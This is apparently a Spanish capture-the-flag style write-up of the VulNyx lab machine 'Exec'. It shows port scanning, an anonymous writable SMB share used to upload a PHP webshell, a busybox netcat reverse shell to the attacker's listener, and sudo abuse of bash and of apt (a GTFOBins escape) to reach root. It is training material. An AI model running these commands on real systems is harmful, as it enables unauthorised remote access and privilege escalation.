🔵 NYX - Exec
#vulnyx #nyx #linux #rce #smb #bash (sudo) #apt (sudo)
Abril 20, 2024 by Miguel R. (d4t4s3c)
Information
Exec es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad bajo y fue creada por el usuario s3cur4.
- Acceso inicial: Accedo a un recurso SMB como invitado y subo un archivo con código PHP obteniendo una shell.
- Escalada de privilegios: El usuario dispone de permisos sudo sobre un usuario y permitirá escapar una shell como root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 19:20 CET
Nmap scan report for 192.168.1.74
Host is up (0.0016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
❯ nmap -sVC -p22,80,139,445 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 19:22 CET
Nmap scan report for 192.168.1.74
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
MAC Address: 08:00:27:C0:A0:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-12T18:22:55
|_ start_date: N/A
|_clock-skew: -2s
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.74
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
445/TCP (SMB)
Basic Enumeration
❯ netexec smb 192.168.1.74
SMB 192.168.1.74 445 EXEC [*] Windows 6.1 Build 0 (name:EXEC) (domain:EXEC) (signing:False) (SMBv1:False)
Shares (Null Session)
Encuentro un share llamado server y dispongo de permisos READ,WRITE
❯ smbclient -NL //192.168.1.74
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
server Disk Developer Directory
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
❯ netexec smb 192.168.1.74 -u '' -p '' --shares
SMB 192.168.1.74 445 EXEC [*] Windows 6.1 Build 0 (name:EXEC) (domain:EXEC) (signing:False) (SMBv1:False)
SMB 192.168.1.74 445 EXEC [+] EXEC\:
SMB 192.168.1.74 445 EXEC [*] Enumerated shares
SMB 192.168.1.74 445 EXEC Share Permissions Remark
SMB 192.168.1.74 445 EXEC ----- ----------- ------
SMB 192.168.1.74 445 EXEC print$ Printer Drivers
SMB 192.168.1.74 445 EXEC server READ,WRITE Developer Directory
SMB 192.168.1.74 445 EXEC IPC$ IPC Service (Samba 4.17.12-Debian)
SMB 192.168.1.74 445 EXEC nobody Home Directories
Dentro del share server hay un archivo index.html, parece que ambos servicios conectan entre ellos en el mismo share
❯ smbclient -N //192.168.1.74/server
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 15 10:45:54 2024
.. D 0 Mon Apr 15 10:04:12 2024
index.html N 10701 Mon Apr 15 10:04:31 2024
Upload (WebShell)
Intento subir con put una webshell PHP y obtengo éxito
smb: \> put cmd.php
putting file cmd.php as \cmd.php (14.6 kb/s) (average 14.6 kb/s)
smb: \> ls
. D 0 Wed Feb 12 19:42:25 2025
.. D 0 Mon Apr 15 10:04:12 2024
index.html N 10701 Mon Apr 15 10:04:31 2024
cmd.php A 30 Wed Feb 12 19:42:25 2025
Reverse Shell
Obtengo una shell como usuario www-data
❯ curl -sX GET "http://192.168.1.74/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.74] 42900
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exec
Shell (s3cur4)
El usuario www-data puede ejecutar como s3cur4 el binario bash con sudo
www-data@exec:/$ sudo -l
Matching Defaults entries for www-data on exec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on exec:
(s3cur4) NOPASSWD: /usr/bin/bash
Me convierto en usuario s3cur4 abusando del privilegio
www-data@exec:/$ sudo -u s3cur4 /usr/bin/bash -i
s3cur4@exec:/$ id
uid=1000(s3cur4) gid=1000(s3cur4) groups=1000(s3cur4)
Privilege Escalation
El usuario s3cur4 puede ejecutar como root el binario apt con sudo
s3cur4@exec:/$ sudo -l
Matching Defaults entries for s3cur4 on exec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User s3cur4 may run the following commands on exec:
(root) NOPASSWD: /usr/bin/apt
En GTFOBins nos dan el one liner para escapar una shell
Me convierto en usuario root abusando del privilegio
s3cur4@exec:/$ sudo -u root /usr/bin/apt update -o APT::Update::Pre-Invoke::=/bin/sh
# bash -i
root@exec:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@exec:~# find / -name user.txt -o -name root.txt |xargs cat
97d8ad**************************
45e398**************************
Hasta aquí la resolución de la máquina Exec.
Happy Hacking!
© d4t4s3c 2023-2025